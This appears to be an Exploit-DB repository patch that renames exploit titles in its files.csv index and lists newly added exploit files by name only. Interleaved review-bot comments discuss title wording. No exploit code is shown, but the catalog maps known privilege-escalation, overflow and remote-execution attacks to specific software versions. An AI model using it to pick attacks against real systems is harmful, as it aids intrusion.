From 538da000af3558784bcbe4ac9430415443502ee0 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 24 Oct 2017 05:02:00 +0000
Subject: [PATCH] DB: 2017-10-24

10 new exploits

FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service
FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service

NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC)
NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)

FreeBSD 6/8 - ata device Local Denial of Service
FreeBSD 6/8 - ata Device Local Denial of Service

FreeBSD 7.2 - pecoff executable Local Denial of Service
FreeBSD 7.2 - 'pecoff' Local Denial of Service

FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service
FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service

FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)
FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)

FreeBSD Kernel - 'mountnfs()' Exploit
FreeBSD - 'mountnfs()' Exploit

FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition
FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition

Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service
BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service

FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service
FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service

FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service
FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service

OpenBSD 3.3/3.4 sysctl - Local Denial of Service
OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service

FreeBSD 9.1 ftpd - Remote Denial of Service
FreeBSD 9.1 - 'ftpd' Remote Denial of Service

FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service
FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service

NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow
NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow

Multiple BSD Distributions - 'strfmon()' Integer Overflow
BSD (Multiple Distributions) - 'strfmon()' Integer Overflow

Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption
BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption

Multiple BSD Distributions - 'printf(3)' Memory Corruption
BSD (Multiple Distributions) - 'printf(3)' Memory Corruption

FreeBSD Kernel - Multiple Vulnerabilities
FreeBSD - Multiple Vulnerabilities

FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow
FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow

ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service

FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation
FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation
FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation
FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation

OpenBSD ftp - Exploit
OpenBSD - 'ftp' Exploit

FreeBSD /usr/bin/top - Format String
FreeBSD - '/usr/bin/top' Format String

FreeBSD 4.x / < 5.4 - master.passwd Disclosure
FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure

FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation
FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation

Oracle 10g - CTX_DOC.MARKUP SQL Injection
Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection

FreeBSD 6x/7 protosw Kernel - Privilege Escalation
FreeBSD 6x/7 - 'protosw' Privilege Escalation

FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation

FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation
FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation

FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation
FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation

Multiple BSD Distributions - 'setusercontext()' Vulnerabilities
BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities

FreeBSD Kernel - 'nfs_mount()' Exploit
FreeBSD - 'nfs_mount()' Exploit

FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit
FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit

Sun Solaris 7.0 sdtcm_convert - Exploit
Sun Solaris 7.0 - 'sdtcm_convert' Exploit

BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3)
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit

NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit
NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit

Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)
Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)
Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)
Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)

BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)
BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)
BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)
BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)

BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon
BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit

FreeBSD 3.3 gdc - Buffer Overflow
FreeBSD 3.3 gdc - Symlink Exploit
FreeBSD 3.3 - Seyon setgid dialer
FreeBSD 3.3 xmindpath - Buffer Overflow
FreeBSD 3.3 angband - Buffer Overflow
FreeBSD 3.3 - 'gdc' Buffer Overflow
FreeBSD 3.3 - 'gdc' Symlink Exploit
FreeBSD 3.3 - Seyon setgid Dialer
FreeBSD 3.3 - 'xmindpath' Buffer Overflow
FreeBSD 3.3 - 'angband' Buffer Overflow

FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit
FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit

BSD mailx 8.1.1-10 - Buffer Overflow (1)
BSD mailx 8.1.1-10 - Buffer Overflow (2)
BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)
BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)

OpenBSD 2.x - fstat Format String
OpenBSD 2.x - 'fstat' Format String

BSD lpr 0.54 -4 - Arbitrary Command Execution
BSD 'lpr' 0.54 -4 - Arbitrary Command Execution

FreeBSD 3.5/4.x /usr/bin/top - Format String
FreeBSD 3.5/4.x - '/usr/bin/top' Format String

Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure
Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure

BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)
BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)
BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)
BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)

BSD Kernel - SHMAT System Call Privilege Escalation
BSD - SHMAT System Call Privilege Escalation

Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation

FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation

NetBSD mail.local(8) - Privilege Escalation (Metasploit)
NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)

OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing
OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing

FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure
FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure

Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation
Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation

Apple Mac OSX 10.10.5 - XNU Privilege Escalation
Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation

Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation

Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)

NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)
NetBSD - 'mail.local(8)' Privilege Escalation

Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation

Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation

Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation

BSD TelnetD - Remote Command Execution (1)
BSD - 'TelnetD' Remote Command Execution (1)

ftpd / ProFTPd (FreeBSD) - Remote Command Execution
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution

FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)
FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)

BSD 4.2 fingerd - Buffer Overflow
BSD 4.2 - 'fingerd' Buffer Overflow

BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)
BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)
BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)
BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)

BSD TelnetD - Remote Command Execution (2)
BSD - 'TelnetD' Remote Command Execution (2)

FreeBSD 3.x/4.x - ipfw Filtering Evasion
FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion

FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow
FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow
FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities

Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow
Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow

NetBSD 1.x TalkD - User Validation
NetBSD 1.x - 'TalkD' User Validation

tnftp - clientside BSD Exploit
tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit

Ayukov NFTP FTP Client < 2.0 - Buffer Overflow

Unitrends UEB 9 - http api/storage Remote Root (Metasploit)
Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)
Polycom - Command Shell Authorization Bypass (Metasploit)

Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection
Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection

cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting
cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting

Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload
Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload

TP-Link TL-MR3220 - Cross-Site Scripting
Logitech Media Server - Cross-Site Scripting
CometChat < 6.2.0 BETA 1 - Local File Inclusion
Kaltura < 13.1.0 - Remote Code Execution
---
 files.csv                            | 194 +++++++++++----------
 platforms/hardware/webapps/43023.txt |  25 +++
 platforms/lin_x86/remote/43030.rb    |  93 ++++++++++
 platforms/lin_x86/remote/43031.rb    | 119 +++++++++++++
 platforms/linux/local/43029.c        | 127 ++++++++++++++
 platforms/multiple/webapps/43024.txt |  43 +++++
 platforms/php/webapps/43027.txt      |  60 +++++++
 platforms/php/webapps/43028.py       |  59 +++++++
 platforms/unix/remote/43032.rb       | 246 +++++++++++++++++++++++++++
 platforms/windows/dos/43026.py       |  62 +++++++
 platforms/windows/remote/43025.py    |  69 ++++++++
 11 files changed, 1005 insertions(+), 92 deletions(-)
 create mode 100755 platforms/hardware/webapps/43023.txt
 create
mode 100755 platforms/lin_x86/remote/43030.rb create mode 100755 platforms/lin_x86/remote/43031.rb create mode 100755 platforms/linux/local/43029.c create mode 100755 platforms/multiple/webapps/43024.txt create mode 100755 platforms/php/webapps/43027.txt create mode 100755 platforms/php/webapps/43028.py create mode 100755 platforms/unix/remote/43032.rb create mode 100755 platforms/windows/dos/43026.py create mode 100755 platforms/windows/remote/43025.py diff --git a/files.csv b/files.csv index a13ae3266..8cec67b1b 100644 --- a/files.csv +++ b/files.csv @@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - 'RCPT TO' Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 -2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 +2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 
@@ -422,7 +422,7 @@ id,file,description,date,author,platform,type,port 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 -2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0 +2874,platforms/bsd/dos/2874.pl,"NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 
@@ -1099,7 +1099,7 @@ id,file,description,date,author,platform,type,port 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0 -9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 +9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata Device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 
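Review bot: the new 9134 title leaves `ata` unquoted while every other component rename in this patch wraps the name in single quotes ('/dev/crypto', 'pecoff', 'vfs_cache', 'sysctl'); for consistency make it `FreeBSD 6/8 - 'ata' Device Local Denial of Service`, or leave the original `ata device` wording if the quote convention is meant only for file and function names.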
@@ -1118,7 +1118,7 @@ id,file,description,date,author,platform,type,port 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 -9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - pecoff executable Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 +9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 
@@ -1425,7 +1425,7 @@ id,file,description,date,author,platform,type,port 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 -11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 +11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 
@@ -1566,7 +1566,7 @@ id,file,description,date,author,platform,type,port 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 +12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 
@@ -1603,7 +1603,7 @@ id,file,description,date,author,platform,type,port 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0 -14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 +14003,platforms/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 14032,platforms/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 
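Review bot: the 14003 line sits under `platforms/freebsd/dos` with type `dos`, yet the new title still says `Exploit` and now also drops `Kernel`, so nothing in the title states the impact or the component class. Since the line is being touched anyway, describe it the way the other dos entries in this patch do, e.g. `FreeBSD - 'mountnfs()' Local Kernel Denial of Service`, unless the exploit source shows it is more than a crash.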
@@ -1707,7 +1707,7 @@ id,file,description,date,author,platform,type,port 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 -14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 +14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 
